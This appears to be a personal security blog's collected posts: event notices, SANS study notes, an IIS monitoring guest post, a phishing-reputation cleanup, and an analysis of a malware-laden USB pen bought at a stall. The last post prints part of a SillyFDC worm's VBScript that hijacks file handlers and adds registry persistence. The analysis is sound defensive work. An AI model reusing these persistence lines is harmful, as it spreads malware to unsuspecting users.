This may sound suspiciously like a Vegas show, by I can assure you Bryce is a great speaker and it will be well worth the time to go and listen to his presentation on “Defending Your Weakest Link…End Users”.

Get along there, especially if you’re a AISA member and soak up what he has to say. Don’t be afraid to ask questions and get involved.

Details

Date: Monday, July 11
Time: 17:30 – 19:30
Venue: ANZ Centre – Core B Upper Ground Conference Suites, 833 Collins Street, Melbourne

Abstract:
In most organizations, a single end-user’s click is all it takes to put critical assets at risk. Hackers mercilessly leverage our ignorance, arrogance and apathy. Traditional defenses are failing us. We’re being hit from every angle: anti-virus evasion, full disk encryption bypass, flash drives, drive-by downloads, social networking, resumes, smart phones, web portals (e.g. Outlook Web Access), open wireless networks, attachments, social-engineering and so much more.

We must understand the true risk we face in today’s threatscape if we are to have a chance to defend ourselves.

This presentation will highlight some of the most salient threats our end users face both in and out of the office and what can be done to mitigate them.

Even with quiet, little blogs such as this, it’s well worth having logging set up and enabled.

For a while now, starting on 13th of June 2011 at 07:18:02, there’s been a consistant slow brute force password attack. Roughly three attempts per hour at guessing the on WordPress admin account. The attack is being redirected from a German hosted open proxy site with the IP address of 95.168.191.160.

It’s been fun for a while to watch, but it’s time to add a block in the ol’ .htaccess file.

There’s a very detail guide on how to use the .htaccess file to lock out those naughtly IP addresses, plus a bunch of over very funky things:

http://www.javascriptkit.com/howto/htaccess.shtml

I expect our friend to find another proxy – if it’s not a bot, or a smarter bot - and continue on.

Part of the joys of being a part of the internet.

The problem is that new developments which compromise your organisations’ IIS web servers keep emerging. The simple truth is it doesn’t take an IT expert to penetrate through your web server security and access your private corporate information. Competitors and past employees might have their reasons for accessing your confidential information – and there are a number of ways through which that goal may be achieved.

Methods for hacking and hijacking web servers have become easier and more accessible. Nowadays someone with no prior infiltrating experience can cause a lot of damage for you by using specifically targeted programs which overload or exploit IIS web servers. When it comes to hacking IIS web servers, one of the simplest methods is through buffer overflows. This occurs when a code is sent to your server which ‘confuses’ the IIS and grants root access to the server. First, hackers would have to find an unpatched IIS server through a program like ‘Dreamscape IISscanner’, which allows hackers to scan individual IP addresses. Once the program identifies that your web server is IIS, then the hacker can go to work by corrupting, defacing or stealing your data and information. Alternatively hackers can use a program which exploits your systems’ vulnerability known as IPP Exploit.

Such methods of hacking are designed to completely bypass typically configured security precautions. Like standard firewall rules and similar safety measures you might have set up. So the question remains – if every Tom, Dick and Harry can access your private corporate information, how can you defend your organization? The answer is simple, ‘keep an eye on it’ and that’s pretty much what event log monitoring does.

Most attacks come in the form of exploiting tools of IIS servers by making use of your system files. By monitoring the activity of such files, you would be able to see all points of access, including if users are tampering with your files, because event log monitoring records and analyzes the event logs of all your network machines. Therefore, if a hacker pops in unannounced, then any changes these hackers try to implement will instantaneously cause an alert to be sent directly to you in real time. In order for this to occur your version of Windows needs to be configured to monitor intrusions, otherwise known as “Object Access”. You can configure this security setting by opening the appropriate policy and expanding the console tree as such: Computer Configuration\Windows Settings\Security Settings\Local Policies\Audit Policy\

What’s extraordinary about this system is that it is simple. Event log monitoring is user-friendly and will enable your organisation to monitor all users attempting to access system files, also personalizing the program to your specific needs. This means that through event log monitoring you will be able to create alerts for specific occurrences, back up or even clear event logs, and a whole lot more. Your goal should be ensuring security and through event log monitoring, this can be easily achieved.

This guest post was provided by Chris DeMicoli on behalf of GFI Software Ltd. GFI is a leading software developer that provides a single source for network administrators to address their network security, content security and messaging needs. More information: GFI events log monitoring solution.

All product and company names herein may be trademarks of their respective owners.

I love this course and it helped me reach a deeper understanding a number of aspects of my role as the IT security person charged with incident response and give me the real world, practical skills and tools you need to do this job.

Why SANS Mentor Training?

The SANS Mentor classes are a great training option, in my opinion, for several reasons:

Pace:

The material is covered over a 10 week period which provides lots of time for you to read on your own time and come back to the mentor meetings with questions and get answers. This helps to digest the massive amount of material in smaller, manageable doses. We study 2 or 3 modules each week and that material can be applied immediately on the job. 

Cost:

The cost is significantly reduced. the cost is lower than any other form of SANS training making it very accessible to those who are budget constrained – which these days is many of us. There is an automatic 25% price reduction from the cost of courses delivered at the conferences.  There is no travel or accommodations, so that massive saving in costs.  And finally, I can generally offer an additional discount if you contact me prior to registration.

Networking: 

Don’t overlook this one.  When you are in the 6-day conference courses, you definitely get a change to meet others, talk about your experiences and issues in the field, and maybe even keep in touch via email.  But when meeting for 10 weekly classes with your peers in the same community, that networking experience is enhanced significantly.  You have the chance to really get to know the others in the class by the shared experiences, work through the material and bounce ideas of each other; that’s a great benefit to being part of a local Mentor class.

Size:

Class sizes are typically small – much smaller than what you would find at a SANS conference, which means we can focus more closely on those areas which are difficult for the group

Material:

You get all the same material as you would from the conference course, including the same books, CDs, and even audio files of the full 6-day course lectures.
Hopefully this gives you an idea of why I think the SANS Mentor classes are a terrific training option.  If you live in the Sydney area and are interested in attending SANS classes, please do contact me to get more details!
 

Free free to e-mail me with any questions, or visit the course website here:
http://www.sans.org/mentor/details.php?nid=24644
 

A great guy and friend Wouter, managed to get a room in Sydney’s CBD to hold the training. It’s easy to get to, has parking nearby.

Mentor training location details

Dates: Thursday, June 2, 2011 – Thursday, August 4, 2011
Meeting Time: 6:00 PM – 8:00 PM
Where:
Ernst & Young Centre
680 George Street
Sydney, Australia 2000

Some useful web sites I use to keep me up to date and  help out studying Security and all things SANS.

The SANS Reading Room www.sans.org/reading_room/
The Honeypot Challenges www.honeynet.org/challenges
The Ethical Hacker www.ethicalhacker.net
Pauldotcom http://pauldotcom.com/wiki/index.php/Main_Page

Darkreading room www.darkreading.com
SANS forensic blog http://computer-forensics.sans.org/

Metasploit unleased www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
Internet Storm Center http://isc.sans.edu/index.html
Security Tube www.securitytube.net

My target – life-, work- and proctor-willing, is to take the exam on Saturday the 20^th March 2010; which is exactly 42 days from now. As we all know 42 is the mean of Life or is that just a spooky coincidence?

I’m going to use an individual index system of each of the 3 courseware (401, 503 and 504). I have a brand new, lined A4 wire bound note book in which I’m handwriting the index of each book.

My goal is to have the 503 books indexed in seven days, then 504 indexed in seven days followed by the monstrous 401 fully indexed in ten days.

The rationale behind this is

1)      To make me read each page of each book and work out if that page should be indexed

2)      To make me read and think about each topic on the page

3)      For me to make side notes on tools, topics or subjects that are unclear

4)      I want to retain and use the knowledge for the practical exam

5)      I like using pen and paper

To make sure I don’t become just book smart, I plan to also run through the practical questions and exercises throughout the courseware books.

I been pretty active with hands on training from studying and passing SANS Advanced Security Essentials – Enterprise Defender (SEC501) and Offensive Security’s Pentesting with Backtrack, but intend to use some of the following sites to keep sharp:

Pauldotcom’s links to challenges, tools and a variety of other madness http://www.pauldotcom.com/wiki/index.php/Main_Page and not to mention actually listening to the podcast

The web site of the three Spanish GSE http://www.radajo.com/ they set a huge benchmark to reach

The internet storm centre for what’s going down in the real world http://isc.sans.org/

The ethical hacker forums can post up some interesting links to other challenges http://www.ethicalhacker.net/

Ed Skoudis and friends various devious, mind-twisting and nefarious challenges http://www.counterhack.net/Counter_Hack/Challenges.html

Mr Skoudis and friends again with command line kung fu in all shapes and flavours  http://blog.commandlinekungfu.com/

Laura Chappell is always fantastic for packets and wireshark http://laurachappell.blogspot.com/

Richard Bejtlich still pops up some great snort and packet stuff despite being a boss now http://taosecurity.blogspot.com

The SANS reading room for a brilliant reading resource and new ideas http://www.sans.org/reading_room/

I felt it was worth while publishing as it covers and answers a question I though about but never asked.

The Question:

I’ve just had a quick look at the site you link to and would be interested to know why this was chosen as the attack platform:

<quote>

* Backtrack version 4

* Fedora Core 12

* Windows  Server

To ensure a level playing field for all candidates, you will not be permitted to use any pre-installed favourite tools that you may have on your laptop. To complete the exercises you must exclusively use the tools and virtual machines provided by GIAC. Failure to comply will result in dismissal from the examination.

</quote>

What does this prove, that you are a pen-tester from 4 years ago (BT1 released May 26, 2006)?

Surely if this exam is meant to show that you have current skills then it should allow you to use current tools.

A great response came back from Mark Baggett, one of the most recently minted GSE.

Mark’s response:

I think of it more like “Hey McGuyver, here is your paperclip and bubble gum, now dodge this.”

I found the old tools added VMWare compatibility complications to the test.

Having newer tools would have been nice. (or not deviating from the system requirements, no matter how smart I thought I was)  That said, the compatibility problems I experienced added to the “pressure cooker” which I think is part of it.  Also, I don’t think that being able to attack ms08-067 requires a different skill set than ms04-011.  Certainly pen-testing has changed a bit since then, but the GSE covers 504 not 560.  All aspects of pen-testing are not part of this.  A very solid understanding of the fundamentals of an attack are required.

When I say firewall, I mean a good, old layer 3 packet filtering device. The things that cost $100 new and are, well, ADSL routers with added security aren’t able to protect a small office by themselves. Added security  equals access control lists in a pretty GUI, so not really the poster boy for defense in depth.

Amazing that some IT “professionals” actually believe having a firewall will stop pc’s from getting malicious software. Thanks goodness the USB device fad never took off.

If you do not have anti-virus software on your home or small office computer, Microsoft provides a free copy you can download from here: http://www.microsoft.com/security_essentials/

It does the job, is simple to use and doesn’t cost a penny. You want something with all the whistles and bells, pick a security suite package from any of the big names.

We now return to our regular programme.

The first one to fix is Web of Trust (WOT), a plug-in for Firefox that is used as part of safe browsing.

Simple option is to create an account, link to your site under the My Site option, and save the web cookie verifier .html file on your home page. Click on verify the site and request it be reviewed. To speed up the process you can ask a few folks to certified it all okay. Takes about a day to go from Red and malicious to Green and good.

The second on is the excellent folks at www.phishtank.com who help steer folks away from evil phishing sites. They are part of OpenDNS, so if you’re using OpenDNS services, this site is marked as a phishing site and you’re told not to enter. OpenDNS results are used by other services, so fixing the reputation here will clean up other safe browsing tools.

Despite my site not being an actual phishing site, the bad guys linked through my domain name to a compromised web site on the same server.

So should you type:

www.chris-mohan.com/~hackedsite/Evil_Fake_PayPal_Phishing_Site/cc.php?cmd=_Confirm_being_ripped_off

and the computer translates it to :

10.1.10.1/~hackedsite/Evil_Fake_PayPal_Phishing_Site/cc.php?cmd=_Confirm_being_ripped_off

The /~hackedsite being another user account on the same server as me. Linux helpfully understands the command uses the ip address of my site (which is the same as a couple of hundred hosted others) and redirects to hackedsite web site. in effect this is what happens

10.1.10.1/~hackedsite/Evil_Fake_PayPal_Phishing_Site/cc.php?cmd=_Confirm_being_ripped_off

The web site hackedsite got closed down when I reported it by the hosting company, so phishing was no longer an issue.

I registered  an account  on www.phishtank.com and asked for the site to be review and reclassifed now that the bad stuff has been removed. Now waiting to see how long it takes before being reviewed.

Update: The faster way to get the site off phishtank was to send an email to the support team at OpenDNS. The team there turn around my request in under a day

It was a lovely thought and I was touched by the gesture.

Both items are of the geek variety and bought from stalls, one a ball point pen with a built in 2GB USB stick that can act as a voice recorder and the other a 240GB USB stick.

3-in-1 Pen-recorder-malware

240GB Flash drive - really?

Now, from having worked with companies that operate in Asia and especially China, I’ve often discovered that some of pieces of technology come with free added “extras”.

I have to admit some level of amazement when told of the 240GB USB flash drive, especial when the afore mentioned relative said he hadn’t seen the 500GB USB flash drive after he’d bought this one. I thought the largest current flash drive available was on 128GB, sadly it appears I was right. A quick search of 240G Sony quick turned up this page. This thing is a total fake and is actually a whooping 32MB. However it looks pretty and I can amaze my friends and family with a 234GB drive that I can’t save anything to. Might give it to the Auditors next time they’re in the office.

Wow it's really 234GB - honest!

I plugged both USB devices in to a spare Linux machine, just to see it any software was on either. The Fake 240GB USB was empty, but the recording pen had lots of goodies.

The first thing that caught my eye was the autorun.ini file. A quick look at that pointed to a MS-DOS.COM saved on the pen. After a quick imaging of the files, I decide to open a copy of the MS-DOS.COM.

The random looking junk didn’t quite look like normal .COM file junk, if only I could have taken SANS Reverse-Engineering Malware: Malware Analysis Tools and Techniques course, I may have been able to do a better analysis. However, halfway through the file, the weird characters disappeared and stuff I can recognize and understand appears in plain English.

This is some of what I extracted:

Dim fs,rg

Set fs = CreateObject("scripting.filesystemobject")

Set rg = CreateObject("wscript.shell")

On Error Resume Next

rg.RegWrite "HKCR\.vbs\", "VBSFile"

rg.RegWrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE","C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"

rg.RegWrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"

rg.RegWrite "HKCR\MSCFile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"

rg.RegWrite "HKCR\regfile\Shell\Open\Command\","C:\WINDOWS\pchealth\Global.exe"

rg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"

rg.RegWrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\","C:\WINDOWS\system32\dllcache\Default.exe"

– Plenty more VBS code chopped out –

This clearly isn’t a real .Com file. Two seconds of searching found out that this is a variant of the SillyFDC worm. A write up of it here talks how it was slapping the US military systems around back in 2008. Most antivirus software would have picked it up, but then again, why test it.

Moral of the story, if you buy kit like this, for the “best price” for a back street stall, buyer beware. Unless you’re a Malware researcher then go mad, it’s Christmas day with every item bought!